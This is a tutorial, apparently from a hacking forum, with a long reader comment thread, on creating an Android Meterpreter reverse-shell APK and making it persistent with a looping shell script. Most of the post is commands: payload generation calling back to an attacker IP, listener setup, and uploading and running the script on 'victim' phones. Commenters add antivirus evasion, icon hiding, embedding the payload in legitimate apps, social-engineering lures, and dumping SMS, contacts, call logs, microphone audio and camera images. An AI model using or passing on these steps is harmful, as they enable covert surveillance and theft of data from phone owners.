How To: Create a Persistent Back Door in Android Using Kali Linux:

Create a Persistent Back Door in Android Using Kali Linux:

OR rather How to make the Backdoor Persistent:

Hello, my Cold and Merciless Hackers,
Welcome to my 5th Post,

In this tutorial I am going to show you how to make the backdoor we created in my guide here a persistent one.

I finally found out a way to do this, as I was/am very poor in bash scripting, I took much time (20hrs approx.) to get the script working and executable, thanks to the raw syntaxes I found out from other sites.

Step 1: Fire Up Kali and Hack an Android System:

Use this guide to hack an android system on LAN.

I'll be hacking on WAN, using a VM.

  • Lets Create a backdoor by typing: msfpayload android/meterpreter/reverse_tcp LHOST=182.68.42.6 R > /root/abcde.apk
  • Now, lets set-up a Listener:
  • msfconsole
  • use exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp
  • set LHOST 192.168.0.4
  • exploit

After the User/Victim Installs and opens the abcde.apk, Meterpreter Comes Up...

Step 2: Create a Persistent Script:

Here.. Copy these commands in a notepad to create a script, and save it as anything.sh (The file extension .sh is important!)

--------------------------------------------------------------------------------------------------------
#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
--------------------------------------------------------------------------------------------------------
(Don't copy these lines "-----" also, there are no line breaks in the 3rd and the 4th line, they are a single line)
(The first line #!/bin/bash is also important as it recognizes the script as a bash shell script)
(You can set the sleep to any amount of seconds you want the script to sleep)

Move/Copy this to the Home/Root folder of KALI.

--------------------------------------------------------------------------------------------------------
Updated Script v3 (Compatible with any android version)
CRITICAL: DO NOT COPY/PASTE THE SCRIPT DIRECTLY, OR IT (may) WON'T WORK /!\
..I guess, you will have to write it on your own.. (Don't ask me why..)
Code:
--------------------------------------------------------------------------------------------------------
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
--------------------------------------------------------------------------------------------------------
There is a 'space' between 'while' and ':'
NO Multiple spaces in the script.
NO Line Break between 3rd and 4th line. (So a total of 5 lines)

Step 3: Upload It to the Hacked Android System:

You need to upload the shell script to etc/init.d/ so that it is persistent even after Reboot!
To do this, navigate to the directory using the following commands:

  • cd /

Now you should be in the ROOT directory, you can check by typing:

  • ls

Now type:

  • cd etc

Check again by typing:

  • ls

Again change directory:

  • cd init.d
  • ls

Here we are...

Time to Upload the Shell Script:

Do this by typing:

  • upload anything.sh

What the? No! We need Root Access to complete this command! Darn!

Never-Mind:

> Lets just make the application (i.e. Main Activity) persistent until Reboot
> However, it will not be persistent after the android system on the Victim goes for a Reboot.
> To do this upload the script anywhere in the sdcard:

  • cd /
  • cd /sdcard/Download
  • ls
  • upload anything.sh

Done! Uploaded!

Step 4: Execute the Script:

Now, all we have to do is execute the script once, and then everything will be done by the script automatically.
Drop into the system's shell by typing:

  • shell

Now, navigate to the location of the script:

  • cd /
  • cd /sdcard/Download
  • ls

Now its time for EXECUTION. Type:

  • sh anything.sh

The script has been Activated! All you have to do is press ctrl+C to terminate the shell (Don't worry the script is still running)

Reboot to eliminate the script or use Task Killer

Step 5: Testing...

You can test it by exiting from meterpreter and again setting up a Listener.
You should get a meterpreter prompt automatically!
PROOF:

Wow! It happened so Fast that 3 sessions got opened one after another.

(I know that the above picture shows that I am hacking on LAN instead of WAN as my Public IP is dynamic and my router had some technical problems, so it kept rebooting itself, so I showed t on LAN, BUT no worries I have tested it on WAN, works Fine )

The END:

Yes! Finally a persistent backdoor has been created successfully for Android systems.

Things to Remember:

  • The persistence of the backdoor will only remain until a reboot of the android system.
  • If you are hacking on WAN and you have a dynamic Public IP, then, the persistence will only remain until your router reboots/your IP changes.
  • Remember to reboot the android to eliminate the running script, if you are testing on you own Android System.
  • If the Victim's Android system is Rooted and your Public IP is Static, then:

1)The Persistence will remain forever on WAN!
2)The Persistence will remain forever on LAN Obviously

Good-Bye Hackers!

Keep Coming For More!
I'll be waiting for Your Likes and Comments,

Thank You,
F.E.A.R.

Just updated your iPhone to iOS 18? You'll find a ton of hot new features for some of your most-used Apple apps. Dive in and see for yourself:

226 Comments

This is so easy do deploy with a little bit of Social Engineering, I gotta try this out.
I see you've been researching a lot to publish this, good job.

Thank You! Ciuffy
Yes I had to do a lot of research to achieve it, with so many Fails.
But at last Success!

Hey I noticed that you used a raw backdoor that would be picked up by any anti virus now a days but I was wondering if there were To make an undetectable backdoor thAt would work the same

start: must be root

Great post F.E.A.R. Is there a way I can embed the meterpreter back door in to an apk file (game,launcher,,etc) ???

Thank You! Sudharsan,

While creating a payload, what we do is embed a trojan/meterpreter in an apk file, which is then known as backdoor/trapdoor.

In other words, it is already embedded into the apk file, while the time of creation.

Thank you for your response F.E.A.R. When the victim download's the app, the app seems useless and the victim uninstall the app.

If I can embed the backdoor in to a game or some other app, the backdoor will not be deleted. is there a way to embed the backdoor ?

I don't think there is an easy way out for that, if you understand complicated ways follow this

Even if you do embed the code, you cannot make it persistent, because with the backdoor embedded, both, the app and the code will launch on the Android System consistently.

Else, just try to convince the victim, that the app is meant to boost his Android, and it works in background. Show him/her the proof with a fake RAM scanner or a normal RAM scanner application. (both would work)

did you find anyway of doing this? making it persistent on a original app?

to prevent a normal user from deleting it just use the meterpreter
hideappicon
which hide the icon from the launcher

Dude thanks for this how to, but i have a problem with the script, when i execute the script remotely, its works, but send me many sessions of meterpreter, is so many than i can't work is like an overflow of sessions. Do you know what happened? And thanks again for your work!

Welcome! Mark,

Yes I know that there is an overflow of sessions even after terminating the shell, however the overflow should end when you get the meterpreter prompt. Maybe the sleep command doesn't work, or try changing that to 2000 because the units maybe in milliseconds.

I'll try it too and update the script.

Yes, found out a problem, Updating the script...Now...
The Units of the sleep command are in seconds.

Thanks dude!! i'll try. And last thing when i created the payload i have to put the LPORT line because, is wasn't work for me.

msfpayload android/meterpreter/reversetcp LHOST=182.68.42.6 LPORT=4444 R > /root/abcde.apk

Port 4444 is the default port, so I hadn't put it there.

My mistake, now is working fine!!!! y put all this commands in a single line.
Now is fixed....
#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 2000
done

Thanks for your amazing job! Really i enjoy your how to!!

Yes I know that, I already updated the script.
And You are Welcome! Mark (actually thanks to you!)

Absolutely amazing! Well done! It's always more fun to write your own scripts. I can't wait fore more of your tutorials!

Just a suggestion: I wouldn't recommend putting your public IP out there, unless it is spoofed or hidden behind an anonymity service.

Thank You! Cracker, (that means a LOT)
Actually those raw syntaxes helped me in writing it.

My Public IP is neither spoofed nor behind an anonymity service, however its dynamic and my firewall has all ports closed, plus it tells me about any network information which is received or sent by my System. (custom firewall)

And that's why I have to turn all of my Firewalls off while I hack.(except router's of-course)
Still, I appreciate the suggestion.

Can we use NOIP for this?

Hi again Back,
Yes, you can (those are not my words, because I haven't tried it yet.)
But I am confident it will work!
There is a slight change in making the payload:

  • msfpayload android/meterpreter/reverse_tcp_dns LHOST=hostname.no-ip.com R > /root/abcde.apk

Great i will try and let you know

Darn it!
Sorry back, I tried, it only works on Windows,

  • msfpayload windows/meterpreter/reverse_tcp_dns LHOST=hostname.ddns.net X > /root/abcde.exe

How i use this in windows? Someone knows? I need to use this in NO-IP, but in kali isnt working.

this payload is invalid!!
is there anyway to make sth like this?

Can i download the pictures on the android phone using kali ? i mean get the pictures on that andoid user . is it possible ?

Of-course!
Use download command

Hi, first thank you for this. I'm having trouble with the script, it keeps me seding the message: Error: Uknown option: --user. What could be? I already try without the "--user 0" option and it runs but does not do what have to do. Does this have to deal with the Android version? Any help would be appreciated.

Hi and Welcome,
Really sorry about the (very) late reply, I actually missed this comment.
This is just an internal error, script is not wrong, tested on the Latest Android Version (5.0.2)
Reboot the android, or try it on another one.

Wait though can't we make a autorunscript that after it connects to the phone it runs cd /
cd sdcard
cd DCIM
upload persistant.sh
shell
cd /
cd /sdcard/DCIM
ls
sh persistant.sh
in that order? just a thought.

Yes, you can. Just remember that if you are in a Meterpreter prompt, you will need to run the relative Meterpreter commands first.

I actually tried it, on the day I posted this, but same thing happened in my comment below.
So I told him to try it out first.

But then I found a mistake too, I made the script to run as soon as the session starts. (And this resulted in overflow, unknown cmds, etc)

But your method seems fine, I though he needed a fully automatic. script.
My mistake.
EDIT: Thank You C|H

Hi, I managed to creat the autorunscript but can't get it to work completely:

to reate it just edit a autorun.rc file in root folder of kali and enter your commands there (one per line) then in msf console run :

set AutoRunScript multiconsolecommand -rc /root/autorun.rc
and it will autorun all those commands when exploit connects.

However putting the commands you mentionned like this won't work because it will not run sh persistent.sh inside the shell, what happens is that it uploads the sh file successfully, then open the shell, and run "sh persistent.sh" in background inside the meterpreter terminal and not the android shell, and I don't know how to fix this.

We need to put some command inside the autorunscript to start the shell with a specific command (sh /sdcard/persistent.sh) but no idea how

Good Idea!

But, I think first try it, because maybe, meterpreter may not be able to handle so many commands, so fast, and it will result in unknown command error, so it's better to execute it step by step,

{As I said, maybe, that doesn't mean you shouldn't try it.}

ok can anyone make an autorunscript file that does this? I can make say run autorunscript <scriptname> and it just stays there. pretty much here's what it does after i connect the metpreter

Session ID 1 (192.168.0.6:666 -> x.x.x.x:10067) processing AutoRunScript 'persist'
and nothing happens after that. my commands are what i commented earlier in a file called persist.

Just a great & very easy to understand tutorial :)

I was just wondering about what would happen if two or more users installed&opened the apk !

Would you be able to control both of them at the same time ?

Thank You A.M,
If two or more users open the apk at the same time, two sessions will be created.
Yes we can control them both at the same time(however one will remain in the background until, we swap.

Sorry for the late reply as I was busy with somethings ^^'

I'd like to know the command to 'swap' between devices please & also wanted to know if there's a problem that might occur when the (.sh file) is put more than once on the same device... for example:

-once in the root area & once at any other place

If you are currently in a Meterpreter session, type background. Once you are back in the Metasploit command line, type sessions -i to view the sessions, and choose by the session number, i.e. sessions -i 2.

Thanks, Cracker|Hacker

I'll wait for F.E.A.R's answer on my second question &
there's also a problem that I'm having whenever I type the command 'shell' i get this error message :

" Error running command shell: Errno::EADDRNOTAVAIL Cannot assign requested address - bind(2) for "127.0.0.1" port 0 "
Any idea on how to fix it ?

Ans1: C|H answered perfectly!

Ans2: No there is no problem at all (your device should have root access to access the 'root area')

Ans3: Hm.. This error should not occur at this stage... "Address not available", the port is in use. Try changing the port and then exploit.

Sorry for my ignorance but... How to change the port exactly ?
Cuz I searched for it but got no results that would help ^^'

While creating the payload, just put this after LHOST:

  • LPORT 8080 (or 80, or try the default one again 4444)

Use the same port, while setting up a listener.

Still same issue :(
Could this be related to that I'm using Kali on VirtualBox ?

Knowing how VirtualBox works for others, probably.

Are there any solutions that I could try to fix this issue ?!
Cuz I can't install Kali outside the VirtualBox at the moment !
& Would installing another VM help ?

Virtual Box?
I have never used it and never will.
Only trust VMware (12 I think) I also like way it allocates memory (RAM)
However the network settings are more complicated to configure but nevermind.
Also, I don't think this problem is because of virtual box but.. Its better to switch to VMware.
Try hacking another device, before switching.

Getting this problem when I execute the ".sh" file on LAN:

'Error: Unknown option: --user'
then many things are written under it like options & such things !

any idea for the this ?

meterpreter > cd init.d

  • stdapifschdir: Operation failed: 1

HELPPPPPPPPP
by the way, great tutorials, keep up the good work! :D

Hi Steven,
Welcome to NullByte!
The device has to be rooted (have root access) to access that directory.
Thank You for the appreciation :)

Where I write the code msfpayload android/meterpreter/reversetcp LHOST=182.68.42.6 R > /root/abcde.apk the result is "Permission denied" how can I proced

you must be the root user.

a

Android 5.x.x have been giving out the parsing error usually associated with unchecking unchecking the allow installation from unknown sources check box. This is causing my two most common RATS to be impossibly to install on devices. could it be that one like your self has a solution.

you need to sign your apk. /Here it tells how

Hi, I just copied your bash script, in my rooted android 5.0.2 phone and when i execute it, it says, while unmatched. I tried addding ; after while and it gives different error. Can someone please help ?

Chaitanya.

Yes, I know, on Lollipop it has issues.
I have tried about 20 such scripts after modifying, but no luck, still trying, it will take time (TIME)
EDIT: Will update the script when, found one working

Ii just tried with the am command line only then there is different message.. moreover i think with android 5, i am able to connect to the android device(non rooted), but not able to execute any reboot or shutdown commands. It should say access/permission denied, but it says unknown command. :(

hello ,

i've done exactly what you said.. its working i have meterpreter shell .. but its like restricted access.. i cant go to /system/etc/init.d or even upload the .sh file to /sdcard/Download directory.. this is the error i get.

and i cant even delete something..
its like restricted permissions.

i created the .apk file and exploit/multi/handler
but i can't run .apk file in my cell phone
what should i do??

-info-
cell phone is LG Gpro2 and android version 4.4.2
this is error message " There is a problem parsing the package"

have you installed the .apk file ?

no... i can't installed the ..apk file....
if i run the .apk file in my phone " There is a problem parsing the package" error message

hi there.!
how can i find the public ip of the android device connected to wifi, and i have no access to that device.
pls help me out.

Google it using the default browser and android phone

i don't have any access to that android device, at that instance how can i?

if target user has dynamic IP above method won't work.so any other way for dynamic ips?

I need Help :( . when sends the file to cell . file can't open after downloading (Sorry bad in English) help me please Thanks

Hi,

I'm having the same problem as Suspéct.

I can perfectly navigate on the android filesystem, download images and stuff is also possible.

If i want to upload the script it produces an error like this:
- core-channel-open: Operation failed: 1

Is there a solution?

Upload it only to sdcard.

Thanks for the quick answer, sadly this produces the same error.

I tried to upload it to the sdcard, extsdcard and a few other places.

any idea what's going wrong?

Recheck:
1) You have placed the script in the root folder of Kali
2) You have used the correct command:
3) upload xxx.sh

I this doesn't work then, it means your android is strict in security matters and hence you either have to root your android or try it on another one.

(Android exploitation is not in full support yet, its quite unstable)

The exploit doesn't seem to start up unless the user selects the MainActivity App again. Is there a way to run the app continuously in the background? I've tried the suggested persistent back door but no luck.

If someone can reply me.. please do it :D

@tryharder I had the same problem. I solved it by manually signing the apk. This may work for you. Look at this link for how to sign the app manually

https://developer.android.com/tools/publishing/app-signing.html#signing-manually

Also, try installing adb with: apt-get install adb
And then install the apk with: adb install you_app.apk
(Note: your device must be connected to the computer for that to work, so nothing remote about that :p)

This step may not be necessary, but it's how I did it. So in case signing it doesn't work for you maybe try that last step too.

Thank you so much F.E.A.R. I have a question: How can we make it persistent decompiling it with apktool? What do we need to add to AndroidManifes.xml or smali?

Most of the victims' phone probably won't be rooted. So after reboot our malicious apk will be useless. If we add required lines to the source can we make it persistent permanently?

Hey do you know if there is a command in meterpreter for android or a way to browse the sys files to get make and model of phone so i can change root

Getting this problem when I execute the ".sh" file on LAN:

'Error: Unknown option: --user'
then many things are written under it like options & such things !

Yeah, script is unstable in lollipop.

my android version isn't lollipop!

Sorry, missed your comment:
Then it should surely work.
Use other commands to run script: './anything.sh'

hi there !
i upload script on 2 device,one device was root but another not rooted.
but when i run script on both of them i get this error >>
: not found6: true
where is the problem?

Yes I know,
Have been working on it for 3 weeks!
Found a solution, updating script...

thanks F.E.A.R

i found a solution and it's work for me.i write and explain exactly what i do.when i copy and paste your script in notpad it dos not working for me but when i write like this it's work.

(sorry for my bad english)

1.in kali linux open terminal and write >> nano anything.sh << and than hit Enter key on keyboard.(this make a new .sh file)

2.on this windows you must write your script code or copy and past it.but i think it's better to writing the code

3.for saving this script you must hit Ctrl+x key together on your keyboard and than hit Y key and after that hit Enter key (it's don your file is saved)

Thank You for the comment,
But I already updated the script.
As for the way you explain how to write the script I agree. You can follow any method both will work.

GO THROUGH. THE POST AGAIN AND READ THIS LINE:
CRITICAL: DO NOT...........WON'T WORK /!\

Hello people , wich version of kaly you use ? Who is the last one with msfpayload ? and working ..?

FEAR , please tell me wich is the last tutorial avalible for reversetcp on android ? only one sesion ...to download some files...

Sorry for my bad english ..

You can use any version of Kali,
If you get the msfpayload error, just use msfvenom.
Its here

Hello F.E.A.R
first i wanna thanks for all of ur great tut :)
i've got so many question,
1.are the LPORT is important ?? i dont see u typin' it when u make the backdoor.apk
2.Since we know our target android phone is not rooted,are we have to place the shell script in the download folder ??
3.can this method works in iphone ??

4.im already make my own payload.apk.on my rooted android its not work :( but work at my other android.what happen with that ??

5.after i set my listener,and launch the Main Activity app on my other android (not rooted),the meterpreter start working,which makes me happy for a while,i take some pic to try it with (webcamsnap) command,its work as well,and then about 10 minutes later ,my meterpreter wont work with reason : Died.what happen ??

Sorry for too much question,and sorry for my bad english because english not my main languange :"(
Hope u reply all of my question
Thanks

You are Welcome Rizky :)

  1. My default LPORT is 4444 so there is no need to change it, until you are 'experimenting' over WAN, and have forwarded port other than 4444.
  1. No don't do that, instead place it in a folder which is rarely explored or looked into. I did it as it is easily accessible from that folder.
  1. Nope the method is for pure android systems.
  1. Is the other phone in which the hack doesn't work is Mi ? It doesn't depend whether the android is rooted or not but it might depend on some systems.
  1. Android meterpreter is very unstable, if you are getting 10min, you are really lucky. That is the reason why I made this persistence tutorial.

Follow it and you can have access to the android forever (provided the android doesn't reboot and you are on LAN)

No problem, I am always happy to help.

hey..thanks for reply me so fast i didnt expect that :)

im just want to say my rooted android phone use some cyanogen-rom i downloaded from the internet,maybe that makes me cant install the generated apk :/

and im still got some question,

1.the phone i try to hack is my own phone (for experiment) and its connected to my LAN,my question is,it is possible to hack someone android that not connected to my LAN ??

2.if im make the sh script and then launch the script,what will happen when target reboot his phone ??
3.what happen when target delete the installed apk ??

Thanks for ur help,i dont even know you but im already like you :D
thanks for helping me :)

Use a file manager/ explorer, navigate to the directory of the generated apk and install from there. (Make sure you have deleted the previously installed apk)

  1. Yes you can test the hack on WAN (outside LAN), you need to fulfill two requirements:

a) the port (4444) used , should be forwarded (give me details about your router and I'll explain port forwarding)

b) while creating the payload you need to replace your internal IP with external/public one. (Type on Google: what's my IP)

  1. If the non rooted target reboots the phone then the persistence will end. (The script will terminate)
  1. If the target deletes the apk then all is lost (session will end)

oops,my bad

Don't reveal your Public IP, ever to anyone (Even if I do)
Also I just want a Company name and Model no. of the router:
For eg: Netgear Router DGN1000 etc.
OR
You can search here on your own.

If it is of Realtek, does the interface matches:

(I am assuming that you know how to login to the router config page...)

hello f.e.a.r
m new in kali linux, plz help me .... when i try to upload script.sh, it shows me an error:

core-channel-open: Operation failed: 1

& can u tell me how can i get root access..? as you've written above "We need Root Access to complete this command! Darn!"

sry 4 my bad English

Hello Saad:

You don't need root access to execute the script, but to access the location you need root, so that the script is persistent even after reboot.

However if the device is not rooted, upload the script anywhere in sdcard, and follow the tutorial further. (The script will terminate after reboot :( )

Hey F.E.A.R, Thank u very much for reply

i am uploading the script in Downloads folder of android device, but the same error :( i am trying this script with galaxy s3, when i want to upload with this command "upload script.sh" it gives me "core-channel-open: Operation failed: 1"

Can you get me a screenshot please?

thanks again :)

Oops, missed the comment,
Follow:

  • cd /
  • upload script.sh
  • shell
  • cd /
  • sh script.sh

(Just upload it to root directory)
EDIT: If there is still an error, just type ls after cd / (in meterpreter) and a screenshot again.

no prob bro thanks for your help :)

There should be no errors at this stage, because the ls cmd works.
Is the application (partially) blocked through the anti-virus?
This specific error indicates that the application has been denied to upload the script.
Try the following:

  • Try and use the download command (to download something), if this doesn't work then the application has been surely blocked by AV.
  • Try to remove/delete a file using rm command.
  • Finally try this with another android.

And tell the results.

i can download files from android device but can't upload.
oky i will try with another android device, thank you very much for your help & very nice tutorial :))

Image via fbcdn.net

upload the script to the path you want in the phone
in your case this should be the following

upload root/script.sh /storage/emulated/legacy/Download

and go to the uploaded path and activate the shell

hello F.E.A.R ,my router is realtek PCIe GBE Family Controller,i dont know what my router number model,im lost the package box,even in the link u provided to me,the only realtek model listed just 1 and thats doesnt even match with my router,any advice ??

You know how to access your Router's login page right? If not then google it. Once you are in, get me a screenshot =)

Hi F.E.A.R awesome tutorial, keep it up!! They are very interesting!!

Though, I have some problem and hope that you have the answers for that, just learning Kali Linux and its so much fun :)

I will send screenshot first and then write my problem.

Image via gyazo.com
  1. Even though my phone is rooted and I have checked by typing in meterpreter, checkroot . It sais Device is rooted with a green plus sign next to it, but even though i try to upload alltid.sh in cd /etc/init.d it sais Operation failed 1.
  2. So I tried the other way by uploading the file to sdcard/Download and it worked, but then when I type. sh alltid.sh (when im in shell) i get the error on the screenshot. I have tried typing your script both in leafpad and in terminal ( nano anything.sh, then typing the scrips code) still I get that error 2 and 3.

Samsung Galaxy s4 running CyanogenMod ROM not MIUI :P

Do you have any idea what the problem is?

Best whishes, Sagate :)

Thank You Sagate! I appreciate it.

1) You need to drop into shell and type su for root access. (A tutorial containing this will be published soon)

2) Go through the tutorial again, I wrote:
" There is a 'space' between 'while' and ':' "

  1. Ohh so I write shell and then type su, then upload alltid.sh in the init.d directory? Will try that when I get home.
  2. My bad, I read there is no space, damn. Im sorry.

Also if you could learn us how to port forward as you stated earlier to hack with WAN.

Thanks F. E. A. R. For the reply, will try this when I get home :-)

Reply with your router details.

I have a technicolor TG799TSvn v2

Follow this guide to open the ports (4444 and 80)

Now test the hack, if it does not work, go to the firewall option of your router's config page and get me a screenshot (OR allow the ports through firewall if you know how to.)

Thank you, I will try that guide and I will try the hack and let you know :)

Btw, It worked! By going into shell and typing su. I was able to type sh alltid.sh and now it works, sessions gets automatic open when I enter meterpreter.

But I still wasnt able to understand how to upload alltid.sh into cd /etc/init.d and look forward to that tutorial but I have the other method in the meantime.

Thank you F.E.A.R :D

finally im figured out what my router model,its TP-LINK TD W8951ND
my new problem is,i dnt know my router password.im gonna back when im log on to the log in page

This guide, right here will explain everything.

Local IP Address: "Your Internal Kali IP (ifconfig)"
Start Port: 4444
End Port: 4444

i have did eevry thing u said but after opening the file i have sent to device and opened and the it says prasing error (there is problem in prasing the packages) need urgent hepl

F.E.A.R thank you for such great tuts :)
i have couple of questions.. i hope u dont mind answering :)
i have done the easy work like creating and signing the apk.

and than i tested it over WAN and it did work fine. problems i faced are, first 3 or 4 time session is closed in less than a minute and on next try it doesn't closed and i had enough time to experiment with commands. can u tell why this happened at start it doesn't show commands like dump sms and other commands ? why does this happen?_

can we start keylogging in meterpreter shell ?
can we migrate or bind our meterpreter process/ session to another process ?

when i record mic, it just record 1 or 2 sec audio even when i typed recordmic 1000 ? can u tell how can record audio for longer duration?

i can not dump my sms and contacts( their was an error dont know why) but i was able to dump my call log.

sorry for lots of questions and excuse my english

Welcome Jessica,
Android Meterpreter is still in development. (It is quite unstable)

After the meterpreter session starts, the commands (dump_sms etc.) can be used and can be displayed using help command. Anti-Virus is the only reason for this to happen. (Specially pre-installed ones, like in Mi or Samsung) If you can somehow make the AV to 'fully trust' the application 'Main Activity' then these problems do not occur (Tested in Mi)

No, we cannot either perform Key-logging or Migrate to other processes, these Post-Modules are for Windows.

However you can use scripts to key-log from the stock android keyboard and for migration purposes (may need root access)

Recording, (record_mic 20) is not an issue for me, try this again without signing the application. (Use it Raw)

Answer to the last question is same as the first one, I use only the raw .apk and there is no problem executing the commands.

Run this command and tell the result in your reply please: check_root

Thank you F.E.A.R. Appreciate you replied fast :))

without signing the apk it can not be installed. i tried it
my test phone is root, i rooted it my self and i checked it with same command.
how do i make AV to trust my apk? can you direct me to such tut or guide ?
record mic stil doesn't work for me. :((

i am only able to dump call log but i can not dump my sms and contacts... i think some kind of timeout, may b i have lots of texts in my inbox and lots of contacts.. iam not sure :?

Thnx again FEAR

Jessica:
You can either make it to 'trust' or disable it's real time protection from settings.

For example in CM security AV application, when I disable the 'Real Time Protection' option, it' doesn't scan the malicious .apk and hence the permissions to access microphone or camera are by default set to grant, however if the option is enabled, the AV scans the permissions of the App and resents them to Prompt or Deny.

If while dumping sms and contacts there is a time-out error then it is because of the faulty/slow connection and not any internal errors. The dumping process may take even 20 minutes (as in my case).

Try deleting all the useless ones (spam) and then dump again. (Just for the test)

Thank You ZI,

But actually there are many other ways to achieve this, I came to know, 3 days after publishing the guide. (Never thought of updating the guide)

Hey Fear I have backdoored the Main activity apk with the original hike apk and the backdoored works great but i want persistant , and i tried your script but it gives me this error when i execute the script from the shell.

meterpreter > shell
Process 3 created.
Channel 4 created.
cd /storage/sdcard0/download
ls
agent.apk
anything.sh
sh anything.sh
Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity }
Error type 3
Error: Activity class {com.metasploit.stage/com.metasploit.stage.MainActivity} does not exist.
Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity }Error type 3
Error: Activity class {com.metasploit.stage/com.metasploit.stage.MainActivity} does not exist.

(I am using this version of script below and when i install only the MainActivity.apk on my android(jelly bean) phone the script works.but when i installed the backdoored apk the script dosen't work and gives me the error shown above. )

(this is the script i am using i think i need to modify something in this script to work it out)
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

Do i need to modify the script to work because i have embeded it into an another apk.Help would be really appriciated.

Ooh I see, nice!
If you did it with Hike, just modify this line-"com.metasploit.stage/.MainActivity".
For Hike it might be something like this: com.google......../."..."

Since I don't use Hike, you can check the correct location by navigating to /sdcard/Android/Data/ for "com.google......."

And the /."..." is used to execute the application, so decompile the app (hike) and extract the name of the program, it should be in the .xml file.

Also this would make the application (hike) with the malicious app open,
but I am sure you will find a way out ;)

Yup! I will try it out today.Hope this works for me:)

Hey Fear as you said i tried to modified the script but it is not working for me or else i am doing it wrong.I am providing you with the android manifest.xml .Here is the androidmanifest.xml

http://www.mediafire.com/view/0jbw13nh4di2ani/AndroidManifest.xml.txt

You told me to navigate to /sdcard/Android/Data/ for "com.google......." and here is the output of that
http://www.mediafire.com/view/4j4t2kq6oqwd7ea/output.txt

So please tell me what changes should i make in "com.metasploit.stage/.MainActivity" to make the script working please i really appreciate if you help me out of this.

come on man i have the same problem if the app opens with the exploit he/she will uninstall it :((((( what should we do ??

how do you do that? can you sent me a copy of your eclipse project?

i have found a way to make it fud by change name in package com.metasploit.stage to com.yourname.stage and also in the java files import package com.yourname.stage

but i cant make it persistannce because i need to register a receiver and also after i need to bind it with another legitime app

is internet is required?

Hi F.E.A.R thanks you for guide. I have a problem to access in /sdcard and also in principally system folder. The error is: stdapifschdir: Operation failed: 1. Can you help me? Test Phone: S3 and S5

I saw that when I install the apk not asking for access permission to sdcard...

Now, I look to hide the icon and task

The apk crash with this code in MainActivity

PackageManager p = getPackageManager();

ComponentName componentName = new ComponentName(this, com.apps.MainActivity.class);

p.setComponentEnabledSetting(componentName,PackageManager.COMPONENTENABLEDSTATEDISABLED, PackageManager.DONTKILLAPP);

I look for a solution

I Found!
Mod backdoor for persistent and hide ico. No rooted devices >>

HERE : HT1.txt

Hi, Do you have a recompiled version of your mod? Would like to try it.

Or can you plz elaborate how to implement and recompile android payload with your mod (HT1.txt)?

Cheers in advance!

Hi, it said the apk is virus when i send it and installed it. the guy had some software cm security or something like it and it said of main activity a dangerous program and it was killed by the anti virus. now how to make save it from the anti virus? ideas? thanks yes it is a great post xD

Yes I know, already tried with all the best Anti-Viruses.

Here's a solution to all the AV's!

hey F.E.A.R. you are doing some grt work here and your tutorial made me so much interested in hacking. a big thanks to u...

and i want to ask u how to port forward on my router...

model number - Tp link w8968v4 i hv tried every guide on the internet but i am unable to get it to work. and can you tell me if there is any way to keylog the hacked but "not rooted" device.

i have the source code of msf payload how i add a receiver?for example bootcomplete or alarm ? because your persistance scipt it works but generates sessions every 20 seconds.

i have found how to make it seems like a legitime app and bypass antivirus but my problem is i need help with android receivers

well work bro

i have a problem when im install the backdoor in the android im getting an error (THERE WAS A PROBLEM WHILE PARSING THE PACKAGE )

PLEASE TELL ME WHAT IT AND HOW TO FIX IT

Hellooo !! can anybody help me about removing the payload android apk from the victim's phone?? plzzz help!!

Hi there F.E.A.R
GREAT tutorial!!
I got WAN working and everything

But, my phone is rooted, and when i drop into shell and su, it shows superuser prompt on screen to get access for MainActivity.

therefore, wont the victim see this and decline it? It is meant to be discreet, no?

Help please, thanks much!!

I have singed and aligned the payload..but it does not install on Huawei phones!!
while makeing the payload..I got no errors.

any solution for lolipop ?

use msfvenom instead of msfpayload

script is not working..
I tried on LAN and WAN.
my android is 5.0.2 and didn't copy and paste the script..I typed it.

but the "upload command" didn't work for me so I uploaded the script using USB cable to my device ( /sd/download) and after shell command and executing the script, I exited the listener and made a new one..but no session activated.

can any body help me ? i get a meterpreter connection and then i upload anything.sh however when i execute anything.sh via shell the script runs but says com.metasploit.stage/.MainActivity not found

F.E.A.R Ocuupy the web can any of u guys help me plz

Hi

Hi there, I have question. If I install Kali on VM machine, which IP will be public and which will be private (Internal).

As I got an issue while session (meterpreter) and I think this will solve the issue.

Thanks

type if config in VM kali to get your internal ip and googly m ip to get your public ip

Thanks dear I am trying now

Still not working, I got stack after typing exploit

Nothing appear

exploit completed, but no session was created

Also, Android device, .apk file I got that the app. already installed coz I install it before, how I can remove maybe this cause issue

please assist me

No body can assist me??

No response>>

if u r using a VM machine, u need to go to network setting of ur machine and set on on bridge.
if u do this ur machine and AP get a same IP then meterpreter session will work

Hi, thanks dear. Your answer is make a sense and I will try it now.

i have the same problem i dont get a session

on LAN or WAN?
if ur trying on LAN and dont get meterpreter session, there must be problems with ur listener port or payload file..

if ur trying on WAN then u should check ur port forwarding. also u need to check if there is any problems while making the payloadfile.apk

Hey guys
I backdoored th payload into HotSpot and change the anything.sh to this:

#!/bin/bash
while :
do am start --user 0 -a android.intent.action.Main -n com.anchorfree.ui/.ViewHome
sleep 600
done

but when I run the "sh anything.sh" it gives me this error:

Error type 3
Error: Activity class {com.anchorfree.ui/com.anchorfree.ui.ViewHome} does not exist.

I do everything exactly as you said. Would you please say what should I do?

use this code

#!/bin/bash
while :
do am start --user 0 -a android.intent.action.Main -n package name/activity address
sleep 600
done

APK size is 0 bytes :(

Thanks for the great post F.E.A.R. but I cant seem to be able to change the directory to init.d

When I listed all the files it wasn't found. Is there an alternate folder is it possible that the startup folder has changed on my Huawei P8???

how to bypass the AV????

very nice tuto.
I have a question plz.can I upload on the victim's a tool to redirect his intrant calls??
thank's very much

thanks fear
but when i execute sh anything.sh it says syntax error while is unmatched what should i do
please reply me as soon as possible

Great tutorial, looking forwarding to trying it later tonight!

Just a quick question about a line of code:
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity

